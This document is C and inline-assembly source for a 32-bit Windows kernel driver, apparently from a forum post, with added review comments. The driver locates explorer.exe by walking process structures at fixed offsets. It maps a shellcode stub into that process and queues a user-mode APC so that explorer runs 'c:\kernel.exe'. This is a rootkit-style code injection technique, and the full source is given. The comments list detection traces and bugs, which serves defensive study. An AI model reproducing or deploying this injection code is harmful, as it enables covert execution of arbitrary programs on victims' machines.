https://forum.eviloctal.com/thread-32192-1-1.html //By:Eros412
// Review notes (comments only; the code is unchanged).
// This listing is a 32-bit Windows kernel driver: from DriverEntry it walks
// process structures at fixed offsets to find the process named "explorer.exe",
// picks one of its threads, maps the driver's own call_me() page into that
// process's user address space and queues a user-mode APC so the thread runs
// call_me() there. call_me() calls one absolute user-mode address with the
// embedded path "c:\kernel.exe" as argument.
// Defensive relevance: it requires a loadable kernel driver, depends entirely
// on build-specific structure offsets and one absolute user-mode address (so it
// does not hold across builds or where that image is relocated), and leaves
// observable traces: DbgPrint strings prefixed "KernelExec ->", a device named
// KernelExec, a non-paged pool allocation tagged 0x206B6444, a driver code page
// mapped into a user process, and a user-mode APC queued from kernel mode.
// Several resource leaks and unchecked failures are noted inline below.
#include <ntddk.h>
#include <ntifs.h>

// File-scope state shared between DriverEntry and the APC kernel routine.
PKAPC_STATE ApcState;   // attach-state block allocated in DriverEntry; never freed (see DriverEntry)
ULONG peprocess;        // process-walk cursor: the calling process on entry, then each visited node
ULONG explorer;         // process object that matched "explorer.exe"
PMDL mdl;               // MDL over call_me()'s page; unlocked and freed in myroutine

// APC environment selector for KeInitializeApc (DriverEntry passes 0 == OriginalApcEnvironment).
typedef enum _KAPC_ENVIRONMENT {
    OriginalApcEnvironment,
    AttachedApcEnvironment,
    CurrentApcEnvironment,
    InsertApcEnvironment
} KAPC_ENVIRONMENT;

// Kernel APC routines declared by hand here (presumably not provided by the included headers).
NTKERNELAPI VOID KeInitializeApc (
    PKAPC Apc,
    PETHREAD Thread,
    KAPC_ENVIRONMENT Environment,
    PKKERNEL_ROUTINE KernelRoutine,
    PKRUNDOWN_ROUTINE RundownRoutine,
    PKNORMAL_ROUTINE NormalRoutine,
    KPROCESSOR_MODE ProcessorMode,
    PVOID NormalContext
);
NTKERNELAPI BOOLEAN KeInsertQueueApc (
    PKAPC Apc,
    PVOID SystemArgument1,
    PVOID SystemArgument2,
    KPRIORITY Increment
);
NTKERNELAPI VOID ExFreePoolWithTag(
    IN PVOID P,
    IN ULONG Tag
);

// Position-dependent stub that DriverEntry maps into the target process and
// installs as the APC's user-mode NormalRoutine. Its byte layout matters:
// DriverEntry overwrites the 32-bit immediate of "push 0ABCDh" (stub offset
// 0x9) with the user-mode address of the string that starts at stub offset
// 0x11 (the 0x14-3 arithmetic in DriverEntry), so the callee receives
// (pointer to "c:\kernel.exe", 1). The callee address is an absolute,
// build-specific user-mode address; the page does not say which API it is.
__declspec(naked) void call_me()
{
    _asm{
        mov eax,0x7C86136D   // absolute user-mode address, valid for one specific build only
        push 1               // pushed first, so it is the second argument under cdecl/stdcall
        nop
        push 0ABCDh          // placeholder immediate; patched by DriverEntry with the string's address
        call eax
        jmp here             // 2-byte short jump over the inline string
        _emit 0x63 // path: c:/kernel.exe (these bytes spell "c:\kernel.exe" followed by two NULs)
        _emit 0x3A
        _emit 0x5C
        _emit 0x6B
        _emit 0x65
        _emit 0x72
        _emit 0x6E
        _emit 0x65
        _emit 0x6C
        _emit 0x2E
        _emit 0x65
        _emit 0x78
        _emit 0x65
        _emit 0x00
        _emit 0x00
        here:
        nop
        retn 0x0C            // pops 12 bytes — presumably the three arguments the APC dispatcher passed; confirm against the x86 user-mode APC convention
    }
}

// Driver unload: deletes the device created in DriverEntry. Nothing else that
// DriverEntry allocates (ApcState, the leaked imagename buffers) is released here.
VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )
{
    if(pDriverObject->DeviceObject!=NULL)
        IoDeleteDevice(pDriverObject->DeviceObject);
}

// APC KernelRoutine: runs in kernel mode when the APC is delivered (presumably
// before the user-mode NormalRoutine, call_me, executes). Frees the APC object
// and unlocks/frees the MDL. Notes: the tag passed here (0) differs from the
// allocation tag 0x206B6444 used in DriverEntry; the user-mode mapping returned
// by MmMapLockedPagesSpecifyCache is never unmapped anywhere in this file; the
// pointer-to-pointer parameters are left untouched, so the queued NormalRoutine
// and its arguments are delivered as initialised.
VOID myroutine(
    IN PKAPC Apc,
    IN OUT PKNORMAL_ROUTINE *NormalRoutine,
    IN OUT PVOID *NormalContext,
    IN OUT PVOID *SystemArgument1,
    IN OUT PVOID *SystemArgument2
)
{
    ExFreePoolWithTag(Apc,0);
    MmUnlockPages(mdl);
    IoFreeMdl(mdl);
}

// Driver entry point. Sequence: create a device with no dispatch routines,
// locate "explorer.exe" and an alertable thread in it by walking structures at
// fixed offsets, lock call_me()'s page in an MDL, map it into explorer's user
// address space while attached, patch the stub's push immediate through that
// mapping, then queue a user-mode APC whose NormalRoutine is the mapped stub.
// Returns STATUS_SUCCESS on every path, including the failure paths that jump
// to end1. Every offset used below is a fixed, build-specific constant.
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegistryPath )
{
    unsigned char alertable;
    int activethread;
    ULONG kthread;              // NOTE(review): not initialised; only assigned inside the inner loop
    PLIST_ENTRY cur;
    PLIST_ENTRY next;
    PLIST_ENTRY tcur;
    PLIST_ENTRY tnext;
    unsigned char * imagename;
    UNICODE_STRING us;
    PDEVICE_OBJECT _device;
    PRKAPC apc;
    PVOID mappedmemory;
    ULONG jmpaddr_9;
    ULONG jmpaddr_14;
    // NOTE(review): the name is written with forward slashes (NT object paths use
    // backslashes) and the IoCreateDevice status is not checked. The device has
    // no dispatch routines; only OnUnload references it.
    RtlInitUnicodeString(&us,L"//Device//KernelExec");
    IoCreateDevice(pDriverObject,0,&us,FILE_DEVICE_UNKNOWN,0x100,0,&_device);
    pDriverObject->DriverUnload=OnUnload;
    peprocess=(ULONG)IoGetCurrentProcess();            // start the walk at the calling process
    // Circular list node embedded at process+0x088; walked with no synchronisation visible here.
    cur=next=(PLIST_ENTRY)((ULONG)peprocess+0x088);
    do{
        // BUG: this 255-byte non-paged allocation is overwritten on the next line
        // and never freed — it leaks once per process visited.
        imagename=(unsigned char*)ExAllocatePool(NonPagedPool,255);
        imagename=(unsigned char*)((ULONG)peprocess+0x174);    // name bytes read in place at a fixed offset
        activethread=*(ULONG*)((ULONG)peprocess+0x1a0);        // thread count at a fixed offset; only printed
        if(!_strnicmp(imagename,"explorer.exe",12)){           // case-insensitive compare of the first 12 bytes
            DbgPrint("%s/t%d threads",imagename,activethread); // NOTE: "/t" is a literal slash-t, not a tab
            explorer=peprocess;
            // Per-process thread list head at a fixed offset; each node sits
            // 0x22C bytes into its thread object.
            tcur=tnext=(PLIST_ENTRY)((ULONG)peprocess+0x190);
            do{
                kthread=(ULONG)tnext-0x22C;
                alertable=*(unsigned char*)(kthread+0x164);     // byte read at a fixed offset, compared to TRUE below
                if((int)alertable==TRUE){
                    DbgPrint("KernelExec -> Found alertable thread");
                    break;                                      // first match ends the thread search
                }
                tnext=tnext->Flink;
            }while(tnext!=tcur);
            break;                                              // first "explorer.exe" ends the process search
        }
        next=next->Flink;
        peprocess=(ULONG)next-0x088;                            // node back to process object
    }while(next!=cur);                                          // stops when the walk returns to the start node
    // BUG: if no "explorer.exe" or no alertable thread was found, kthread (and
    // explorer) are never assigned, yet both are used below regardless.
    DbgPrint("KernelExec -> Targeted thread: 0x%p",kthread);
    apc=ExAllocatePoolWithTag(NonPagedPool,0x30,0x206B6444);   // 0x30 bytes for the APC object, tagged 0x206B6444
    if(apc==NULL)
        DbgPrint("KernelExec -> Failed to allocate memory");   // BUG: failure is only logged; apc is still used below
    mdl=IoAllocateMdl(call_me,100,0,0,0);                       // MDL over 100 bytes starting at call_me (kernel code)
    if(mdl==0){
        DbgPrint("KernelExec -> Failed to allocate MDL");
        ExFreePoolWithTag(apc,0);                               // tag 0 differs from the allocation tag above
        goto end1;                                              // still returns STATUS_SUCCESS
    }
    // AccessMode 0 (KernelMode), Operation 1 (IoWriteAccess). This call reports
    // failure by raising, and there is no __try around it.
    MmProbeAndLockPages(mdl,0,1);
    ApcState=ExAllocatePool(NonPagedPool,sizeof(KAPC_STATE));  // unchecked allocation; never freed
    KeStackAttachProcess((PKPROCESS)explorer,ApcState);         // switch address space so the mapping lands in explorer's user range
    // AccessMode 1 (UserMode), MmCached, no requested base, no bugcheck on failure, NormalPagePriority (0x10).
    mappedmemory=MmMapLockedPagesSpecifyCache(mdl,1,1,0,0,0x10);
    if(mappedmemory==NULL){
        DbgPrint("KernelExec -> Cannot map address");
        KeUnstackDetachProcess(ApcState);
        IoFreeMdl(mdl);                                         // NOTE(review): no MmUnlockPages on this path
        ExFreePoolWithTag(apc,0);                               // tag 0 differs from the allocation tag above
        goto end1;                                              // still returns STATUS_SUCCESS
    }
    DbgPrint("KernelExec -> UserMode memory at address:0x%p",mappedmemory);
    jmpaddr_9 = (ULONG)mappedmemory+0x9;                        // user-mode address of the push immediate in the stub (offset 0x9)
    jmpaddr_14 = (ULONG)mappedmemory+0x14-3;                    // relative jmp is 2 bytes, so subtract 3: user-mode address of the embedded string (offset 0x11)
    // Store the string's user-mode address into the push immediate, through the
    // user-mode mapping, while still attached to explorer.
    _asm{
        pushad
        pushfd
        mov ecx,jmpaddr_9
        mov edx,jmpaddr_14
        mov [ecx],edx
        popfd
        popad
    }
    KeUnstackDetachProcess (ApcState);
    // Environment 0 = OriginalApcEnvironment, KernelRoutine = myroutine, no rundown
    // routine, NormalRoutine = the user-mode mapping, ProcessorMode 1 (UserMode),
    // NormalContext NULL.
    KeInitializeApc(apc,(PETHREAD)kthread,0,myroutine,0,mappedmemory,1,0);
    if(!KeInsertQueueApc(apc,0,0,0))
        DbgPrint("KernelExec -> Failed to insert APC");
    // NOTE(review): printed even when insertion failed (no else), and nothing is
    // freed on that path — apc, the MDL, its locked pages and the mapping all remain.
    DbgPrint("KernelExec -> APC delivered");
end1:
    return STATUS_SUCCESS;
}